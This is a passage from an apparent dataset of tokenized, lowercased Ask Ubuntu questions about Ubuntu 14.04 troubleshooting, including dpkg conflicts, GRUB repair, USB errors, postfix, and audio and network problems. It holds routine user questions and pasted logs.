libjasper1 : i386 libjbig0 : i386 libjpeg-turbo8 : i386 libjpeg8 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-3 : i386 libkrb5support0 : i386 libp11-kit0 : i386 libpango-1.0-0 : i386 libpangocairo-1.0-0 : i386 libpangoft2-1.0-0 : i386 libpixman-1-0 : i386 libsm6 : i386 libtasn1-6 : i386 libthai0 : i386 libtiff5 : i386 libx11-6 : i386 libxau6 : i386 libxcb-render0 : i386 libxcb-shm0 : i386 libxcb1 : i386 libxcomposite1 : i386 libxcursor1 : i386 libxdamage1 : i386 libxdmcp6 : i386 libxext6 : i386 libxfixes3 : i386 libxi6 : i386 libxinerama1 : i386 libxp6 : i386 libxrandr2 : i386 libxrender1 : i386 libxt6 : i386 nspluginviewer : i386 nspluginwrapper use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libmotif-common the following new packages will be installed : libmotif-common 0 upgraded , 1 newly installed , 0 to remove and 95 not upgraded . 5 not fully installed or removed . need to get 0 b/11.8 kb of archives . after this operation , 116 kb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 168327 files and directories currently installed . ) preparing to unpack ... /libmotif-common_2.3.4-5_all.deb ... unpacking libmotif-common ( 2.3.4-5 ) ... dpkg : error processing archive /var/cache/apt/archives/libmotif-common_2.3.4-5_all.deb ( -- unpack ) : trying to overwrite '/usr/include/x11/bitmaps/xm_hour32 ' , which is also in package libmotif4 2.3.4-1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ramesh @ ramesh-k56ca : ~/cpract $ ramesh @ ramesh-k56ca : ~/cpract $ sudo dpkg -p -- force-remove-reinstreq libmotif4 dpkg : dependency problems prevent removal of libmotif4 : libmotif4-dbg depends on libmotif4 ( = 2.3.4-1 ) . motif-clients depends on libmotif4 . dpkg : error processing package libmotif4 ( -- purge ) : dependency problems - not removing errors were encountered while processing : libmotif4 ramesh @ ramesh-k56ca : ~/cpract $ sudo dpkg -p -- force-all -- force-remove-reinstreq libmotif4 dpkg : libmotif4 : dependency problems , but removing anyway as you requested : libmotif4-dbg depends on libmotif4 ( = 2.3.4-1 ) . motif-clients depends on libmotif4 . ( reading database ... 168326 files and directories currently installed . ) removing libmotif4 ( 2.3.4-1 ) ... purging configuration files for libmotif4 ( 2.3.4-1 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... ramesh @ ramesh-k56ca : ~/cpract $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : lib32z1 libatk1.0-0 : i386 libavahi-client3 : i386 libavahi-common-data : i386 libavahi-common3 : i386 libc6-i386 libcairo2 : i386 libcups2 : i386 libdatrie1 : i386 libexpat1 : i386 libffi6 : i386 libfontconfig1 : i386 libfreetype6 : i386 libgcrypt11 : i386 libgdk-pixbuf2.0-0 : i386 libglib2.0-0 : i386 libgnutls26 : i386 libgpg-error0 : i386 libgraphite2-3 : i386 libgssapi-krb5-2 : i386 libgtk2.0-0 : i386 libharfbuzz0b : i386 libice6 : i386 libjasper1 : i386 libjbig0 : i386 libjpeg-turbo8 : i386 libjpeg8 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-3 : i386 libkrb5support0 : i386 libp11-kit0 : i386 libpango-1.0-0 : i386 libpangocairo-1.0-0 : i386 libpangoft2-1.0-0 : i386 libpixman-1-0 : i386 libsm6 : i386 libtasn1-6 : i386 libthai0 : i386 libtiff5 : i386 libx11-6 : i386 libxau6 : i386 libxcb-render0 : i386 libxcb-shm0 : i386 libxcb1 : i386 libxcomposite1 : i386 libxcursor1 : i386 libxdamage1 : i386 libxdmcp6 : i386 libxext6 : i386 libxfixes3 : i386 libxi6 : i386 libxinerama1 : i386 libxp6 : i386 libxrandr2 : i386 libxrender1 : i386 libxt6 : i386 nspluginviewer : i386 nspluginwrapper use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libmotif-common libmotif4-dbg motif-clients mwm the following new packages will be installed : libmotif-common mwm the following packages will be upgraded : libmotif4-dbg motif-clients 2 upgraded , 2 newly installed , 0 to remove and 92 not upgraded . 5 not fully installed or removed . need to get 4,382 kb/4,553 kb of archives . after this operation , 6,816 kb disk space will be freed . do you want to continue ? [ y/n ] y get:1 http : //in.archive.ubuntu.com/ubuntu/ trusty/universe libmotif4-dbg amd64 2.3.4-5 [ 4,378 kb ] get:2 http : //in.archive.ubuntu.com/ubuntu/ trusty/universe motif-clients all 2.3.4-5 [ 3,300 b ] fetched 4,382 kb in 15s ( 285 kb/s ) ( reading database ... 168277 files and directories currently installed . ) preparing to unpack ... /libmotif-common_2.3.4-5_all.deb ... unpacking libmotif-common ( 2.3.4-5 ) ... preparing to unpack ... /archives/mwm_2.3.4-5_amd64.deb ... unpacking mwm ( 2.3.4-5 ) ... dpkg : error processing archive /var/cache/apt/archives/mwm_2.3.4-5_amd64.deb ( -- unpack ) : trying to overwrite '/usr/share/man/man4/mwmrc.4.gz ' , which is also in package motif-clients 2.3.4-1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) preparing to unpack ... /libmotif4-dbg_2.3.4-5_amd64.deb ... unpacking libmotif4-dbg : amd64 ( 2.3.4-5 ) over ( 2.3.4-1 ) ... preparing to unpack ... /motif-clients_2.3.4-5_all.deb ... unpacking motif-clients ( 2.3.4-5 ) over ( 2.3.4-1 ) ... dpkg : warning : unable to delete old directory '/etc/x11/mwm ' : directory not empty processing triggers for man-db ( 2.6.7.1-1 ) ... processing triggers for menu ( 2.1.46ubuntu1 ) ... warning : the string include-menu-defs did not occur in template file /etc/x11/mwm//system.mwmrc-menu errors were encountered while processing : /var/cache/apt/archives/mwm_2.3.4-5_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ramesh @ ramesh-k56ca : ~/cpract $
464302	how to find specific switch in man page	suppose i want to know the usage of -i switch in grep command without scrolling . i need the specification just for that command or at least see the screen show that first . so how ? as you can say that in general not just for grep -i .
464303	wi-fi deconnected / reconnected about 5 minutes after startup	about 5 minutes after start up my wi-fi allways disconnect / reconnect . do you have any ideas how can i avoid that ?
464304	uninstall yesterday 's synaptic packages with virtual terminal on ubuntu 14.04	how to uninstall packages that were installed on 10 may 2014 , using only a virtual terminal ? available are virtual terminals , using ctrl+alt+f1 or +f2 . going back to the screen with ctrl+alt+f7 is possible . the package names are unknown . background : only routine jobs were done on an updated install ( that was upgraded to ubuntu 14.04 earlier ) . at the end of the session the latest packages were installed with synaptic . the icon panel , terminal and top panel are missing after starting ubuntu . the settings are visible with right click on the desktop and were not altered . resolution of the monitors is ok . the screens are empty save for the ( default ) background image . xylo answered this question . however , when trying xylo 's answer , i tried something else too : from ctrl-alt-f1 : sudo startx , goes back to empty screen and a terminal is available . so i did sudo dconf reset -f /org/compiz and setsid unity . this gives a side panel with icons but no top panel and a lot of warnings . the question is now : how to get the top panel back and make both panel persist ? correction : the question is now ; my password is not accepted anymore , what to do ; password was changed succesfully , but login returns the login screen ; i will write a new question .
464306	a command which checks that trim is working ?	i have installed ubuntu 14.04 lts 64bit , and would liek to make sure that trim is enabled ( as much as i know - it is enabled by default ) . is there asome sort of command which would help me to find out if it is working correctly ? thanks .
464309	allow virtual machine to use all resources	i develop in an ubuntu vm because it 's awesome and windows is abysmal . however , i 'm dabbling in webgl and need my graphics card . whenever i view 3d sites in my vm it says my graphics card is n't supported , meaning the vm uses some sort of software graphics card . so my question is : how can my vm utilise my physical graphics card ? can this be done through unity ? or will i have to partition my drive and transfer my vm to the partition ? can this partition still be booted like a vm from windows if needs be , when i need to use photoshop and be programming ?
464313	ubuntu server 12.04 stopped reading usb sticks with i/o errors	i have an essential installation of ubuntu 12.04 server that , after some days of working perfectly , stopped reading correctly any usb sticks ( with regular fat32 fs ) . dmesg reports i/o errors on sdb device on various logical blocks . the drives work if i open them under windows . here 's the output of the dmesg command [ 14359.180040 ] usb 1-1 : new high-speed usb device number 11 using ehci-pci [ 14359.314241 ] usb 1-1 : new usb device found , idvendor=125f , idproduct=c81a [ 14359.314252 ] usb 1-1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 14359.314259 ] usb 1-1 : product : a-data usb flash drive [ 14359.314264 ] usb 1-1 : manufacturer : a-data [ 14359.314270 ] usb 1-1 : serialnumber : 05b451e4811710 [ 14359.387730 ] usb-storage 1-1:1.0 : usb mass storage device detected [ 14359.388468 ] scsi2 : usb-storage 1-1:1.0 [ 14359.388761 ] usbcore : registered new interface driver usb-storage [ 14360.389055 ] scsi 2:0:0:0 : direct-access a-data usb flash drive 0.00 pq : 0 ansi : 2 [ 14360.389857 ] sd 2:0:0:0 : attached scsi generic sg1 type 0 [ 14360.394442 ] sd 2:0:0:0 : [ sdb ] 15771759 512-byte logical blocks : ( 8.07 gb/7.52 gib ) [ 14360.395199 ] sd 2:0:0:0 : [ sdb ] write protect is off [ 14360.395226 ] sd 2:0:0:0 : [ sdb ] mode sense : 00 00 00 00 [ 14360.395899 ] sd 2:0:0:0 : [ sdb ] asking for cache data failed [ 14360.396074 ] sd 2:0:0:0 : [ sdb ] assuming drive cache : write through [ 14391.120049 ] usb 1-1 : reset high-speed usb device number 11 using ehci-pci [ 14391.258646 ] sd 2:0:0:0 : [ sdb ] asking for cache data failed [ 14391.258767 ] sd 2:0:0:0 : [ sdb ] assuming drive cache : write through [ 14422.096053 ] usb 1-1 : reset high-speed usb device number 11 using ehci-pci [ 14422.812566 ] sdb : sdb1 [ 14423.418535 ] sd 2:0:0:0 : [ sdb ] asking for cache data failed [ 14423.418676 ] sd 2:0:0:0 : [ sdb ] assuming drive cache : write through [ 14423.418810 ] sd 2:0:0:0 : [ sdb ] attached scsi removable disk [ 14442.923044 ] usb 1-1 : usb disconnect , device number 11 [ 14442.932079 ] sd 2:0:0:0 : [ sdb ] unhandled error code [ 14442.932094 ] sd 2:0:0:0 : [ sdb ] [ 14442.932102 ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 14442.932110 ] sd 2:0:0:0 : [ sdb ] cdb : [ 14442.932114 ] read ( 10 ) : 28 00 00 f0 a8 67 00 00 01 00 [ 14442.932136 ] end_request : i/o error , dev sdb , sector 15771751 [ 14442.932259 ] buffer i/o error on device sdb , logical block 15771751 [ 14442.933569 ] buffer i/o error on device sdb , logical block 63 [ 14442.933742 ] buffer i/o error on device sdb , logical block 63 [ 14442.933936 ] buffer i/o error on device sdb , logical block 63 [ 14442.934132 ] buffer i/o error on device sdb , logical block 63 [ 14442.934325 ] buffer i/o error on device sdb , logical block 63 [ 14442.934515 ] buffer i/o error on device sdb , logical block 63 [ 14442.934701 ] buffer i/o error on device sdb , logical block 63 [ 14442.934878 ] buffer i/o error on device sdb , logical block 120 [ 14442.935031 ] buffer i/o error on device sdb , logical block 121
464315	why does installing grub fail while installing ubuntu minimal ?	this is my list of partitions : + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | partition | file system | mount | bootable | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | partition 1 | fat32 | | no | | partition 2 | ext4 | / | yes | | partition 3 | ext4 | /home | no | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + all the installation steps complete perfectly , until install the grub boot loader on a hard disk . the error message i get is : unable to install grub in /dev/sda executing grub-install /dev/sda failed . this is a fatal error . continuing the installation without a boot loader , i reboot to find myself at the grub > prompt . how do i go from here ?
464318	trying to run recovery of grub	hi i 'm following this : how to install the boot-repair tool in an ubuntu live disc ? but i get the following error at the end . # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' /boot/efi detected in the fstab of sda9 : uuid=f2c9-69db ( sda1 ) *******lspci -nnk | grep -ia3 vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation haswell-ult integrated graphics controller [ 8086:0a16 ] ( rev 09 ) subsystem : asustek computer inc. device [ 1043:13fd ] kernel driver in use : i915 00:03.0 audio device [ 0403 ] : intel corporation haswell-ult hd audio controller [ 8086:0a0c ] ( rev 09 ) ******* grub-install : info : executing modprobe efivars 2 > /dev/null . grub-install : info : looking for /sys/firmware/efi ... grub-install : info : ... not found . looking for /proc/device-tree ... grub-install : info : ... not found . grub-install : error : /usr/lib/grub/i386-pc/modinfo.sh does n't exist . please specify -- target or -- directory . , . grub too old for secureboot . please report this message to boot.repair @ gmail.com chroot /mnt/boot-sav/sda9 efibootmgr -v fatal : could n't open either sysfs or procfs directories for accessing efi variables . try 'modprobe efivars ' as root . chroot /mnt/boot-sav/sda9 uname -r kernel : 3.13.0-24-generic winefi detected . do you want to activate [ backup and rename windows efi files ] ? yes ( if any choice fails , please retry with the other ) reinstall the grub-efi of sda9 grub-install : error : /usr/lib/grub/i386-pc/modinfo.sh does n't exist . please specify -- target or -- directory . grub-install : exit code of grub-install :1 error : no grub*.efi generated . please report this message to boot.repair @ gmail.com add /mnt/boot-sav/sda9/boot/efi efi entries in /mnt/boot-sav/sda9/etc/grub.d/25_custom adding custom /mnt/boot-sav/sda9/boot/efi/efi/microsoft/boot/bootmgfw.efi adding custom /mnt/boot-sav/sda9/boot/efi/efi/boot/bootx64.efi sda1/bootx64.efi already added sda1/bootmgfw.efi already added -- -- grub-install verbose /usr/sbin/grub-install : 1 : /usr/sbin/grub-install : can not create n\f0\f0tt @ t @ ddp\e5td\8c\d2\8c\d2l\8c\d2ll9l9q\e5tdr\e5td\f0=\f0=n\f0=n/lib64/ld-linux-x86-64.so.2gnugnum : directory nonexistent + elf @ @ @ @ @ @ \f8\f888 @ 8 @ @ @ d : d : \f0=\f0=n\f0=n\9e { \81 /usr/sbin/grub-install : 1 : /usr/sbin/grub-install : elf : not found /usr/sbin/grub-install : 2 : /usr/sbin/grub-install : syntax error : `` ) '' unexpected -- -- -- -- /usr/sbin/grub-install : exit code of grub-install :2 -- -- end of grub-install verbose chroot /mnt/boot-sav/sda9 efibootmgr -v fatal : could n't open either sysfs or procfs directories for accessing efi variables . try 'modprobe efivars ' as root . chroot /mnt/boot-sav/sda9 update-grub generating grub configuration file ... found linux image : /boot/vmlinuz-3.13.0-24-generic found initrd image : /boot/initrd.img-3.13.0-24-generic found windows recovery environment ( loader ) on /dev/sda2 found windows 8 ( loader ) on /dev/sda4 unhide grub boot menu in sda9/boot/grub/grub.cfg an error occurred during the repair . you can now reboot your computer . you may want to retry after deactivating the [ backup and rename windows efi files ] option . the boot of your pc is in legacy mode . you may want to retry after changing it to efi mode .
464324	how to open a folder in linux via terminal ?	how can i open a folder in a dir ? say i change my current directory to : cd /root/dir/ then i list all the files there : ls folder1 folder2 folder3 now i want to open folder1 . if i try the `` ./ '' i get : ./folder1 bash : ./folder1 : is a directory how can i do so without having to type cd again ie : cd $ ( pdw ) /folder1
464328	ltsp - thin client vs fat client - how does the root folder work ?	there is plenty of information on the internet including here , but i could not find a specific discussion on it . any comment is appreciated . sorry if it is a very rookie question . i installed ubuntu 14.04 and the ltsp server . i also use virtual box to emulate a diskless thin/fat client to test it . for now , i understand that the ltsp creates chroot environment at /opt/ltsp/i386/ ( or amd64 ) of the server ( host ) . until now , i found that : ***for thin client ( common build option , no desktop installed ) , after my logging into ldm using server username and password , the root folder will be the actual root of the server . however , if press alt+ctrl+f1 into terminal with admin accound logged in , the root folder is the chroot , which is reasonable . ***for fat client ( 'fat_client_desktops= '' ubuntu-desktop '' ' in /etc/ltsp/ltsp-build-client.conf ) as described in this tutorial , the root folder will be the chroot environment ( /opt/ltsp/i386/ as mentioned above ) of course , the interface is different , where thin client will be the gnome-core version as i installed on my ubuntu server , and fat client uses unity , although i guess it is the default settings . so , my question is how fat client got into graphic interface with chroot environment ? but thin version is straight server root ? or , can i change the root such as , make the fat client visit actual server root and chroot for thin client ? i asking because i saw some tutorial saying you can install desktop by apt-get in a thin client , so that should be a conversion to fat client ? but i can not see how this would change the root folder mounting . thanks a lot !
464331	how to convert linux swap drive to windows readable format	okay so i 'm rather new to linux but i my laptop has 2 drives . one 64gb msata that i use for my windows boot drive and a terrabyte hdd that i use for all my other files . i decided to create a new partition on the hdd and install ubuntu on that drive . i used the wuubi setup and all went as it should except i was not aware of swap drives . i tried setting it up so that i didnt have one but apparently that did not work as when logging back into windows later , i could not access many files or programs as i had absolutely no access to 2nd hdd . it does not come up in windows explorer or disk management . i found another drive manager to try ( ext2 volume manager ) and that listed the partition with all my files as a swap drive format . how do i convert the 2nd hdd back to an ntfs format to access from windows without loss of my data ? ? ?
464333	no animations shown when restoring a minimized window on ubuntu 14.04	i do n't see the minimizing animation while minimizing the window , i see the animation only when i reopen the window after it has been minimized
464337	shutting down all services ( server backup )	i am running ubuntu server 12.04 lts . after many trials and errors , the backup strategy i have selected resorts to using tar ( mostly because i was unable to find a tool to backup/restore dovecot mailboxes to an archive rather than mirror it to another server ) . the plan is to shutdown services for the shortest possible duration when the backup is ongoing . i guess that the most sensitive services are apache2 , php and mysql since they are required for webpage availability . postfix , mailman and dovecot can be shutdown longer , since waiting a few minutes for them is not critical . my questions are : is there an order in which i need to shutdown services ? how do i find those which rely on each other ? for instance , i recon it is best to shutdown apache before php or mysql , that way the web server becomes unavailable altogether , instead of potentially displaying odd stuffs to the visitors . what about dovecot , mailman , postfix , bind ? do they rely on mysql ? do they need other services ? what if i want to perform a snapshot ? how can i shutdown all non critical running services and restart them later ? the idea is to minimize as much as possible write access on the disk during the backup . edit : the server is hosted somewhere in the world . i can only access it through ssh .
464338	turn ubuntu 14.4 to a reverse proxy	have 2 vps with ubuntu linux os the first one is ddos protected and the other one is not . and im running a game server in the non protected vps and i want to use the protected vps as a ddos shield for the game server . i tried to use haproxy and socat but i failed to do that in all the ports . anyone got ideas about doing that with ip tables or with any other program in ubuntu 14.4 ? im using 3 main ports in my game server and i want to protect . i just wanted the protected vps to act like the main game server . the ports im using in my game server is 7171 & 7173 & 80 . thanks in advance .
464339	`` sometimes '' fails to go into suspend mode	i have been using ubuntu since 13.04 . i am using ubuntu 14.04 now . when i first installed ubuntu 13.04 , there was no problem about suspend mode . however , since some time ago , suspend mode has started to fail . when i push the power button to suspend , the screen get black , while the fan stays moving . at this time , there is no way to control the machine . any key inputs , including alt + sysrq + reisub do n't work . the only thing i can do is to hold down the power bottom until the machine stops . this problem does n't always happen when suspending . in most cases , it works fine . about once in ten times , the problem occurs . does anyone know the cause of the problem ?
464341	installing windows base drivers on an msi laptop with ubuntu os	hi i just recently installed ubuntu on some of my msi laptops and i just want to ask if there is a way i can install my device drivers while using ubuntu as an os , the drivers i 'm talking about is the drivers for the devices like built in webcam , gfx card etc . cause drivers are available on windows format only . is there a way for me to install these drivers ?
464343	how can i access my hikvision ip-cam over vlc ?	my setup is as following : the ip-cam ( hikvision ds-2cd2632f-is ) is connected to a router . my notbook is connected to the same router . the router is set to dhcp . the factory default ip of the ip-cam is 192.0.0.64 , i have changed that ip successfully to 192.168.1.34 ( with the hikvision software on a windows pc ) . how can i connect to my ip-camera by using vlc media player ? sudo arp-scan -- interface=eth0 -- localnet [ sudo ] password for empedokles : interface : eth0 , datalink type : en10mb ( ethernet ) starting arp-scan 1.8.1 with 256 hosts ( http : //www.nta-monitor.com/tools/arp-scan/ ) 192.168.1.1 00:22:10:82:61:40 motorola mobility , inc. 192.168.1.33 00:80:3f:3a : d6:79 tatung company 192.168.1.34 44:19 : b7:27 : c2 : fa ( unknown ) 192.168.1.200 00:18 : fe:6d : cb:3e hewlett packard 4 packets received by filter , 0 packets dropped by kernel ending arp-scan 1.8.1 : 256 hosts scanned in 1.451 seconds ( 176.43 hosts/sec ) . 4 responded tatung company is my digital tv-box and not the ip-cam . 192.168.1.34 ( unknown ) should be the ip-cam . empedokles @ empedokles : ~ $ ifconfig eth0 link encap : ethernet hardware adresse 08:9e:01:35:86 : e8 inet adresse:192.168.1.40 bcast:192.168.1.255 maske:255.255.255.0 inet6-adresse : fe80 : :a9e:1ff : fe35:86e8/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx-pakete:106463 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:73674 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:90962221 ( 90.9 mb ) tx-bytes:16044389 ( 16.0 mb ) lo link encap : lokale schleife inet adresse:127.0.0.1 maske:255.0.0.0 inet6-adresse : : :1/128 gültigkeitsbereich : maschine up loopback running mtu:65536 metrik:1 rx-pakete:16876 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:16876 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:0 rx-bytes:1428659 ( 1.4 mb ) tx-bytes:1428659 ( 1.4 mb )
464347	how to make yahoo messenger work ?	just curious if anyone has had any luck or made any progress getting yahoo messenger to work with ubuntu ? i know empathy and viber and a lot of other work , but there are parts of yahoo that make it a better fit for some of the people i am trying to convince to switch to ubuntu .
464348	how to publish a printer in 14.04	in ubuntu 14.04 my printer is showing as shared but not published . i do n't have a server settings button to publish my printer where is it ?
464350	how to create two users who can read files of each other ?	how to create 2 users a and b from shell , that will be able to read files of each other ( say a can read the files of b , and b can read the files of a ) . sudo adduser newuser sudo passwd newuser
464354	update nvidia drivers with xorg-edgers ppa	i wanted to update my nvidia drivers to version 337.19 with this package . i installed the ppa as described here . sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-graphics-drivers-337 however , it is unable to locate the package . unable to locate package nvidia-graphics-drivers-337 i am using ubuntu 14.04 .
464362	flash hardware accleration	is there a way to use hw acceleration with flash player on firefox ? i 've an ati 7400g . ubuntu 14.04 . thank you .
464369	installing ubuntu on acer aspire one d150-1bb	i have an acer aspire one d150-1bb . it came with windows xp installed . i wish to use ubuntu in it . do i need to partition the hdd , or any other preparation , or is it all dealt with automatically with the download ?
464371	postfix unable to pass messages to amavis ( ca n't connect to inet4 socket 127.0.0.1 )	i have been trying to get postfix to work with amavis but have been unable . no matter what i have tried i ca n't get past the following error : [ snip ] ca n't connect to inet4 socket 127.0.0.1 i can successfully run telnet 127.0.0.1 10024 and amavis answers . nothing else in the logs to indicate a problem . does anyone know how i can further troubleshoot this ? postconf -n follows : alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes config_directory = /etc/postfix home_mailbox = maildir/ inet_interfaces = all inet_protocols = all mailbox_command = mailbox_size_limit = 0 mydestination = thegodshalls.com , localhost.com , , localhost myhostname = thegodshalls.com mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 myorigin = /etc/mailname readme_directory = no recipient_delimiter = + relayhost = smtp_tls_note_starttls_offer = yes smtp_tls_security_level = may smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_recipient_restrictions = permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_local_domain = smtpd_sasl_security_options = noanonymous smtpd_tls_cafile = /etc/ssl/certs/cacert.pem smtpd_tls_auth_only = no smtpd_tls_cert_file = /etc/ssl/certs/smtpd.crt smtpd_tls_key_file = /etc/ssl/private/smtpd.key smtpd_tls_loglevel = 1 smtpd_tls_received_header = yes smtpd_tls_security_level = may smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_tls_session_cache_timeout = 3600s smtpd_use_tls = yes tls_random_source = dev : /dev/urandom
464376	can i install ubuntu 14.04 lts on a laptop without pae ?	since my computer dates back to 2003 , has an intel pentium m processor and is therefore not yet equipped with pae , i want to know if it is possible to install newer versions of ubuntu as the version 12.04 lts now ? lubuntu and xubuntu have not worked for me and i do not want to , because their support will end soon . i have successfully installed version 12.04 ( the non-pae version ) , but should like to the current version ubuntu 14 , is that possible ? would an update to bring something ? because newer ubuntu versions still run my knowledge , only with pae ?
464378	usb mobile broadband modem unusually slow	i 'm using ubuntu 14.04 with tp-link ma260 usb mobile broadband modem . so far , modem worked 'out of the box ' ( plug-in , enter sim card pin number and select 'connect ' ) . the problem is connection speed . usually the speed is between 5 - 20 kb/s . what 's interesting : when i take the sim card out of the modem and put it into my mobile phone ( nokia e5 ) , connect it via usb cable to computer and use the same procedure to connect , the speed is between 100 - 300 kb/s . i also tried changing connection type in 'network connections ' to 3g ( umts/hsdpa ) , but it had no effect ... it seems to me that usb modem wo n't change from 2g to 3g . thanks for any help .
464381	unity dash not saving changes	i 'm using an up-to-date ubuntu 14.04 and my unity dash has stopped saving changes . so changes such as unlocking launchers or adding launchers are not retained after a reboot . i have no idea how to fix this . do you have any suggestions ?
464384	ubuntu 14.04 game problems	i 've recently updated to ubuntu 14.04 , and league of legends and world of warcraft have both stopped working . with world of warcraft , there are no error codes provided , and it just does n't allow me to open the applications . with league of legends , the game client opens and allows me to log in , but once i 'm in game , the shop you use to buy items freezes as soon as i click to open it . i also found another problem . i closed my league of legends game over an hour ago that was being played on playonlinux . i then started to play warthunder on steam , but that game froze in the queue finder , and league of legends was there in the background , even though the game has been closed for over an hour . i do n't have any idea why it 's doing that , and it could be many things maybe causing it .
464386	switching off wireless card	i have hp 250 g2 laptop with windows 7 and ubuntu 14.04 ( dual-boot ) . on my keyboard i have wireless on/off button ( fn+f12 ) , which turns wi-fi and bluetooth on/off , but this works only on windows . on ubuntu this button does nothing . however , this is n't a problem , since you can switch wi-fi and bluetooth on/off via network applet . the problem is a led light indicating wireless card status . on windows the light changes from white to red , when i turn off both wi-fi and bluetooth . on ubuntu it stays white , even when i turn off wi-fi and bluetooth ( via applet ) . question : is the card really powered off , even if the light is white ? ( i would like the card to be switched off for better battery time . ) p.s . : one time , when i was using mobile broadband connection and i switched wi-fi off ( in applet ) , the light went red , and when i turned it on again , it became white ... but i was unable to re-create this again . thanks for any help .
464388	no sound from laptop speakers in ubuntu 14.04 after booting into windows 8.1	i have a dell inspiron 15 7537 . i had installed 14.04 on it , and had no problems with the sound initially . however , like my with ethernet card , it seemed expecting to not have driver/software issues in linux was unrealistic . i purchased an ssd for the laptop and installed ubuntu 14.04 on that . then , i used gparted to copy over the windows partition from the disk that came with the laptop . everything still worked just fine , until i booted into windows 8.1 . the sound worked fine while i was in windows , but after rebooting the laptop , and going back into ubuntu , the sound stopped working through the internal laptop speakers . i noticed however , that i was still able to use my headphones to receive sound while in ubuntu . from here on , i could boot into windows 8.1 to receive sound through the internal speakers , but i could no longer get the sound to work again in ubuntu 14.04 unless using headphones . i decided to experiment , so i completely wiped the disk , and did a fresh install of ubuntu 14.04 . the sound was back ! i then again proceeded to copy over my windows partition . again , after booting into windows 8.1 , and then coming back to ubuntu , my internal speakers would no longer produce sound . i have tried the most common solutions like : sudo apt-get remove -- purge alsa-base pulseaudio sudo apt-get install alsa-base pulseaudio unity-control-center sudo alsa force-reload or pulseaudio -k i have also tried making sure that nothing was muted in alsamixer . i have also tried installing the pulse audio volume control tool . if i have a song playing , i can see the audio levels moving for the internal speakers , as if it should be playing . the pulse audio volume control tool also shows my hdmi card was a sound device , but it recognizes it as off . it may be worth noting that in alsamixer , the application seems to recognize my pch/output card as the secondary card , and the hdmi as the first . however , this has always been the case , so i am not sure that is the problem . i do n't know a lot about how this is all engineered , but in my understanding i am having a hard time gathering how booting into another os could stop the speakers from working in another . what can i do to restore sound to my system , and determine why booting into windows causes this behaviour ? i would very much like to use a dual boot system . lspci -v output : 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) subsystem : dell device 05f9 flags : bus master , fast devsel , latency 0 capabilities : < access denied > 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 05fa flags : bus master , fast devsel , latency 0 , irq 60 memory at e3000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 5000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 00:03.0 audio device : intel corporation haswell-ult hd audio controller ( rev 09 ) subsystem : dell device 05f9 flags : bus master , fast devsel , latency 0 , irq 63 memory at e3610000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : dell device 05f9 flags : bus master , medium devsel , latency 0 , irq 56 memory at e3600000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) subsystem : dell device 05f9 flags : bus master , fast devsel , latency 0 , irq 61 memory at e3619000 ( 64-bit , non-prefetchable ) [ size=32 ] capabilities : < access denied > kernel driver in use : mei_me 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) subsystem : dell device 05f9 flags : bus master , fast devsel , latency 0 , irq 62 memory at e3614000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 1 ( rev e4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 capabilities : < access denied > kernel driver in use : pcieport 00:1c.2 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 